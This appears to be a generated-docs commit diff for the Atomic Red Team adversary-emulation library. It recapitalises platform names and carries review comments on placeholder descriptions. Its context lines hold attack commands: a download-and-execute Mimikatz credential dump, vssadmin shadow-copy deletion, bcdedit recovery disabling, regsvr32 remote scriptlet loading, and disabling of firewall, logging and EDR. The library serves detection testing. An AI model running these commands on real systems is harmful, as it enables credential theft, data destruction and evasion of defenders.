Generate docs from job=validate_atomics_generate_docs branch=prettier-platform-markdown

CircleCI Atomic Red Team doc generator
2018-05-23 20:12:24 +00:00
parent e0d0b72bb9
commit 71c8d405c0
21 changed files with 63 additions and 64 deletions
+2 -2
@@ -24,7 +24,7 @@ Requires Network: No</blockquote>
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
TODO
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Inputs
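Review bot: the description line of this test is the placeholder "TODO" (and test #2 in the same file, "Compress Data for Exfiltration With Rar", carries the same placeholder); since this markdown is generator output, the fix is a real description in the source atomic definition followed by a regenerate, not an edit to this file.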
@@ -43,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
## Atomic Test #2 - Compress Data for Exfiltration With Rar
TODO
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `powershell`!
+4 -4
@@ -153,7 +153,7 @@ Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>
## Atomic Test #1 - Powershell Mimikatz
Dumps Credentials via Powershell by invoking a remote mimikatz script
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Inputs
@@ -171,7 +171,7 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
## Atomic Test #2 - Gsecdump
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -184,7 +184,7 @@ gsecdump -a
## Atomic Test #3 - Windows Credential Editor
http://www.ampliasecurity.com/research/windows-credentials-editor/
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -198,7 +198,7 @@ wce -o #{output_file}
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
+1 -1
@@ -22,7 +22,7 @@ Permissions Required: User, Administrator, SYSTEM</blockquote>
## Atomic Test #1 - Scan a bunch of ports to see if they are open
xxx
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
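Review bot: the description for "Scan a bunch of ports to see if they are open" is still the placeholder "xxx"; the heading already says what the test does, so the source atomic definition should get a one-line description (and ideally a note on which ports and target are scanned) before the docs are regenerated.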
+5 -5
@@ -46,7 +46,7 @@ Contributors: Travis Smith, Tripwire</blockquote>
## Atomic Test #1 - List all accounts
xxx
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Inputs
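Review bot: every test in this file (tests #1 through #5) has the placeholder description "xxx" or "xxx (requires root)"; the commands visible in the following hunk headers (`cat /etc/passwd`, `cat /etc/sudoers`, `grep 'x:0:' /etc/passwd`) are enough to write real descriptions in the source atomic definitions and regenerate.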
@@ -64,7 +64,7 @@ cat /etc/passwd > #{output_file}
## Atomic Test #2 - View sudoers access
xxx (requires root)
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Inputs
@@ -82,7 +82,7 @@ cat /etc/sudoers > #{output_file}
## Atomic Test #3 - View accounts with UID 0
xxx
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Inputs
@@ -100,7 +100,7 @@ grep 'x:0:' /etc/passwd > #{output_file}
## Atomic Test #4 - List opened files by user
xxx
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
@@ -113,7 +113,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logger in remotely
xxx
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
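Review bot: the heading "Show if a user account has ever logger in remotely" has a typo and should read "logged in"; fix it in the source atomic definition so it survives the next regenerate. Also, the command in this hunk's header, `username=$(echo $HOME | awk -F'/' '{print $3}')`, only works for two-level home paths such as `/home/user`; for `/root` the third field is empty and `lsof -u` gets an empty name, so `$(id -un)` would be the robust choice.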
+4 -4
@@ -26,7 +26,7 @@ Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems
## Atomic Test #1 - Disable iptables firewall
Disables the iptables firewall
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
@@ -48,7 +48,7 @@ fi
## Atomic Test #2 - Disable syslog
Disables syslog collection
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
@@ -68,7 +68,7 @@ fi
## Atomic Test #3 - Disable Cb Response
Disable the Cb Response service
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
@@ -88,7 +88,7 @@ fi
## Atomic Test #4 - Disable SELinux
Disables SELinux enforcement
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
+3 -3
@@ -26,7 +26,7 @@ Permissions Required: User, Administrator, SYSTEM</blockquote>
## Atomic Test #1 - Set a file's access timestamp
Stomps on the access timestamp of a file
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Inputs
@@ -44,7 +44,7 @@ touch -a -t 197001010000.00 #{target_filename}
## Atomic Test #2 - Set a file's modification timestamp
Stomps on the modification timestamp of a file
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Inputs
@@ -65,7 +65,7 @@ Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Inputs
+1 -1
@@ -26,7 +26,7 @@ Requires Network: Yes</blockquote>
## Atomic Test #1 - xxxx
xxxx
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `bash`!
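Review bot: both the heading ("Atomic Test #1 - xxxx") and the description of this test are placeholders, so a reader cannot tell what the test does even from the title; this needs a real name and description in the source atomic definition before the generated page is useful.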
+13 -13
@@ -50,7 +50,7 @@ Contributors: Walker Johnson</blockquote>
## Atomic Test #1 - Victim configuration
Create a temporary directory and several files on the victim system for later deletion
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
@@ -66,7 +66,7 @@ echo "This file will be shredded" > /tmp/victim-shred.txt
## Atomic Test #2 - Delete a single file
Delete a single file from the temporary directory
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
@@ -79,7 +79,7 @@ rm -f /tmp/victim-files/a
## Atomic Test #3 - Delete an entire folder
Recursively delete the temporary directory and all files contained within it
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
@@ -92,7 +92,7 @@ rm -rf /tmp/victim-files
## Atomic Test #4 - Overwrite and delete a file with shred
Use the `shred` command to overwrite the temporary file and then delete it
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
@@ -105,7 +105,7 @@ shred -u /tmp/victim-shred.txt
## Atomic Test #5 - Victim configuration
Create a temporary directory and several files on the victim system for later deletion
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -135,7 +135,7 @@ type nul > g
## Atomic Test #6 - Delete a single file - cmd
Delete a single file from the temporary directory using cmd.exe
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -148,7 +148,7 @@ del /f %TEMP%\victim-files-cmd\a
## Atomic Test #7 - Delete an entire folder - cmd
Recursively delete the temporary directory and all files contained within it using cmd.exe
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -161,7 +161,7 @@ del /f /S %TEMP%\victim-files-cmd
## Atomic Test #8 - Delete a single file - ps
Delete a single file from the temporary directory using Powershell
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `powershell`!
@@ -174,7 +174,7 @@ Remove-Item -path %TEMP%\victim-files-ps\a
## Atomic Test #9 - Delete an entire folder - ps
Recursively delete the temporary directory and all files contained within it using Powershell
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `powershell`!
@@ -187,7 +187,7 @@ Remove-Item -path %TEMP%\victim-files-ps -recurse
## Atomic Test #10 - Delete VSS - vssadmin
Delete all volume shadow copies with vssadmin.exe
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -200,7 +200,7 @@ vssadmin.exe Delete Shadows /All /Quiet
## Atomic Test #11 - Delete VSS - wmic
Delete all volume shadow copies with wmic
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -213,7 +213,7 @@ wmic shadowcopy delete
## Atomic Test #12 - bcdedit
xxx
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -227,7 +227,7 @@ bcdedit /set {default} recoveryenabled no
## Atomic Test #13 - wbadmin
xxx
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
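Review bot: tests #12 (bcdedit) and #13 (wbadmin) still have the placeholder description "xxx", while every other test in this file has a proper one-liner; the bcdedit hunk header (`bcdedit /set {default} recoveryenabled no`) already shows the intent, so descriptions such as "Disable Windows recovery via bcdedit" belong in the source atomic definitions.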
+1 -1
@@ -32,7 +32,7 @@ Contributors: John Strand</blockquote>
## Atomic Test #1 - Brute Force Credentials
Creates username and password files then attempts to brute force on remote host
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Inputs
+4 -4
@@ -32,7 +32,7 @@ Data Sources: API monitoring, Process monitoring, File monitoring</blockquote>
## Atomic Test #1 - Screencapture
Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macos
**Supported Platforms:** macOS
#### Inputs
@@ -51,7 +51,7 @@ screencapture
## Atomic Test #2 - Screencapture (silent)
Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macos
**Supported Platforms:** macOS
#### Inputs
@@ -70,7 +70,7 @@ screencapture -x
## Atomic Test #3 - X Windows Capture
Use xwd command to collect a full desktop screenshot and review file with xwud
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Inputs
@@ -90,7 +90,7 @@ xwud -in #{output_file}
## Atomic Test #4 - Import
Use import command to collect a full desktop screenshot
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Inputs
+2 -2
@@ -28,7 +28,7 @@ Data Sources: API monitoring</blockquote>
## Atomic Test #1 - Utilize Clipboard to store or execute commands from
Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
@@ -42,7 +42,7 @@ clip < readme.txt
## Atomic Test #2 - PowerShell
Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `powershell`!
+3 -3
@@ -36,7 +36,7 @@ Contributors: Casey Smith</blockquote>
## Atomic Test #1 - Regsvr32 local COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Inputs
@@ -54,7 +54,7 @@ regsvr32.exe /s /u /i:#(unknown) scrobj.dll
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Inputs
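Review bot: the command in this hunk's header, `regsvr32.exe /s /u /i:#(unknown) scrobj.dll`, carries an input reference that does not match the `#{name}` form used elsewhere (the next hunk's header uses `#{url}`), so it reads as an unresolved or malformed input; check the input name in the source atomic definition for test #1 and regenerate.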
@@ -72,7 +72,7 @@ regsvr32.exe /s /u /i:#{url} scrobj.dll
## Atomic Test #3 - Regsvr32 local DLL execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Inputs
+2 -2
@@ -26,7 +26,7 @@ Permissions Required: User</blockquote>
## Atomic Test #1 - SourceRecorder via Windows command prompt
Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Inputs
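Review bot: the heading says "SourceRecorder via Windows command prompt" but the command in the following hunk header is `SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}`; the heading should read "SoundRecorder", corrected in the source atomic definition.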
@@ -45,7 +45,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
+3 -4
@@ -64,17 +64,16 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward</blockquote>
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks
Executes the code in a project file using. C# Example
**Supported Platforms:** windows
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| filename | Location of the project file | Path | T1127.csproj|
|------|-------------|------|---------------|
| filename | Location of the project file | Path | T1127.csproj|
#### Run it with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe T1127.csproj
```
<br/>
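Review bot: the separator row change is the substantive fix in this hunk: the old `|-------------------------------------------|` is a single-cell separator, so the four-column Inputs table would not render as a table, while the new `|------|-------------|------|---------------|` matches the header's column count. Separately, the description "Executes the code in a project file using. C# Example" is a broken sentence and should be reworded in the source atomic definition (for example "Executes the code in a project file using inline tasks. C# example").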
+1 -1
@@ -42,7 +42,7 @@ Contributors: Itzik Kotler, SafeBreach, Travis Smith, Tripwire, Red Canary, Matt
## Atomic Test #1 - Install root CA on CentOS/RHEL
Creates a root CA with openssl
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
+2 -2
@@ -24,7 +24,7 @@ Permissions Required: Administrator</blockquote>
## Atomic Test #1 - Create a user account on a Linux system
Create a user via useradd
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Inputs
@@ -43,7 +43,7 @@ useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
## Atomic Test #2 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
**Supported Platforms:** macos
**Supported Platforms:** macOS
#### Run it with `bash`!
+1 -1
@@ -20,7 +20,7 @@ Permissions Required: User</blockquote>
## Atomic Test #1 - xxxx
xxxx
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Inputs
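Review bot: the heading and description of this test are both the placeholder "xxxx", so the generated page gives no indication of the technique being exercised; a real name and description are needed in the source atomic definition.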
+6 -6
@@ -32,7 +32,7 @@ Permissions Required: User</blockquote>
## Atomic Test #1 - Clear Bash history (rm)
Clears bash history via rm
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
@@ -45,7 +45,7 @@ rm ~/.bash_history
## Atomic Test #2 - Clear Bash history (echo)
Clears bash history via rm
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
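Review bot: the description of "Clear Bash history (echo)" still reads "Clears bash history via rm", copied from test #1; the command in the next hunk header is `echo "" > ~/.bash_history`, so the description should say "via echo". Fix it in the source atomic definition so the regenerated markdown is right.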
@@ -58,7 +58,7 @@ echo "" > ~/.bash_history
## Atomic Test #3 - Clear Bash history (cat dev/null)
Clears bash history via cat /dev/null
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
@@ -71,7 +71,7 @@ cat /dev/null > ~/.bash_history
## Atomic Test #4 - Clear Bash history (ln dev/null)
Clears bash history via a symlink to /dev/null
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
@@ -84,7 +84,7 @@ ln -sf /dev/null ~/.bash_history
## Atomic Test #5 - Clear Bash history (truncate)
Clears bash history via truncate
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
@@ -97,7 +97,7 @@ truncate -s0 ~/.bash_history
## Atomic Test #6 - Clear history of a bunch of shells
Clears the history of a bunch of different shell types by setting the history size to zero
**Supported Platforms:** linux
**Supported Platforms:** Linux
#### Run it with `sh`!
+1 -1
@@ -22,7 +22,7 @@ Permissions Required: User</blockquote>
## Atomic Test #1 - Disable history collection
Disables history collection in shells
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Inputs
+1 -1
@@ -37,7 +37,7 @@ Permissions Required: User</blockquote>
## Atomic Test #1 - Create a hidden file in a hidden directory
Creates a hidden file inside a hidden directory
**Supported Platforms:** linux, macos
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
+3 -3
@@ -30,7 +30,7 @@ Contributors: Justin Warner, ICEBRG</blockquote>
## Atomic Test #1 - Chrome (Developer Mode)
xxx
**Supported Platforms:** linux, windows, macos
**Supported Platforms:** Linux, Windows, macOS
#### Run it with these steps!
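Review bot: the description of "Chrome (Developer Mode)" is the placeholder "xxx" (as is test #2, "Chrome (Chrome Web Store)"); since these are manual step-by-step tests, a one-line description of what the steps install and why it matters for detection is needed in the source atomic definitions.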
@@ -49,7 +49,7 @@ tick 'Developer Mode'.
## Atomic Test #2 - Chrome (Chrome Web Store)
xxx
**Supported Platforms:** linux, windows, macos
**Supported Platforms:** Linux, Windows, macOS
#### Run it with these steps!
@@ -65,7 +65,7 @@ in Chrome
## Atomic Test #3 - Firefox
Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** linux, windows, macos
**Supported Platforms:** Linux, Windows, macOS
#### Run it with these steps!
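Review bot: the Firefox test's description, "Create a file called test.wma, with the duration of 30 seconds", is the SoundRecorder description from the audio-capture file in this same commit and has nothing to do with a browser extension; replace it in the source atomic definition with a description of the Firefox extension installation steps.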